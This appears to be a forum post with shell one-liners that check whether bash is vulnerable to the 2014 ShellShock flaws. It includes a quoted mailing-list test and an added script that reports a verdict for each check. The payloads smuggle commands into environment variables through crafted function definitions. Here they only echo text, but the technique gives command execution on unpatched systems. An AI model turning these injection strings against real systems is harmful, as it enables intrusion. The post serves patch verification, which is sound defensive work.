### OLD SH**. read first post ###
To test if a system is vulnerable, run the following in a terminal
(in the code examples ">" is the terminal prompt)
1. Attack vector alpha
> env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
If you get the "vulnerable" message above then the system is just that
safe system:
> env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
2. Attack vector beta
> env X='() { (a)=>\' sh -c "echo date"; cat echo
sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
Thu Sep 25 21:13:13 CEST 2014
if you get the date at the bottom you're vulnerable
safe system:
> env X='() { (a)=>\' sh -c "echo date"; cat echo
sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
date
cat: echo: No such file or directory
3. Attack vector gamma
> bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
if you don't get the vulnerable message your system is OK
4. Attack vector theta
> (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
if you don't get the vulnerable message your system is OK
taken from
http://lists.gnu.org/archive/html/bug-b ... 00238.html
------------8<----------------------------------------------------------------------------------------
So, to FULLY test whether you are still vulnerable to ShellShock, we
must come up with a test that proves that NO possible function body
assigned to a valid shell variable name can EVER cause bash to invoke
the parser without your consent. For that, I use this (all on one line,
even if my mailer wrapped it):
> bash -c "export f=1 g='() {'; f() { echo 2;}; export -f f; bash -c 'echo \$f \$g; f; env | grep ^f='"
which is sufficient to test that both normal variables and functions can
both be exported, AND show you whether there is a collision in the
environment. Ideally, you would see the following result (immune to
shell-shock):
1 () {
2
f=1
--------------------------------------------------------------------------------------->8---------------
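The checks above wrapped as a script that prints one verdict per test, as an added example that is not part of the original post or the quoted mail. The function names and the BASH_BIN variable are this example's own, beta calls bash directly instead of sh, and theta builds its input with a counter instead of {1..200}.

```shell
#!/bin/sh
# Added example: the page's tests as functions printing "ok" or "VULNERABLE".
# Function names and BASH_BIN are hypothetical, not from the page.
BASH_BIN=${BASH_BIN:-bash}   # assumption: the bash under test is on PATH

# Vector alpha: a vulnerable bash runs the command trailing the function body.
check_alpha() {
    out=$(env x='() { :;}; echo vulnerable' "$BASH_BIN" -c 'echo this is a test' 2>/dev/null) || true
    case $out in *vulnerable*) echo VULNERABLE ;; *) echo ok ;; esac
}

# Vector beta: a vulnerable bash leaves a file named "echo" behind, so the
# test runs in a scratch directory. bash is called directly because sh may
# be a different shell on the system being checked.
check_beta() {
    dir=$(mktemp -d) || return 1
    (cd "$dir" && env X='() { (a)=>\' "$BASH_BIN" -c 'echo date' >/dev/null 2>&1) || true
    if [ -e "$dir/echo" ]; then echo VULNERABLE; else echo ok; fi
    rm -rf "$dir"
}

# Vector gamma (CVE-2014-7186): non-zero exit on 14 stacked here-documents.
check_gamma() {
    if "$BASH_BIN" -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' 2>/dev/null
    then echo ok; else echo VULNERABLE; fi
}

# Vector theta (CVE-2014-7187): non-zero exit on 200 nested for loops.
check_theta() {
    if { i=1; while [ "$i" -le 200 ]; do echo "for x$i in ; do :"; i=$((i+1)); done
         i=1; while [ "$i" -le 200 ]; do echo done; i=$((i+1)); done; } | "$BASH_BIN" 2>/dev/null
    then echo ok; else echo VULNERABLE; fi
}

# Export test from the quoted mail: only the exact three lines it lists
# ("1 () {", "2", "f=1") count as immune.
classify_export() {
    expected=$(printf '1 () {\n2\nf=1')
    if [ "$1" = "$expected" ]; then echo immune; else echo not-immune; fi
}
run_export() {
    "$BASH_BIN" -c "export f=1 g='() {'; f() { echo 2;}; export -f f; $BASH_BIN -c 'echo \$f \$g; f; env | grep ^f='" 2>/dev/null || true
}

for t in alpha beta gamma theta; do echo "$t: $(check_$t)"; done
echo "export: $(classify_export "$(run_export)")"
```

Set BASH_BIN to the full path of a specific bash binary to check a copy other than the first one on PATH.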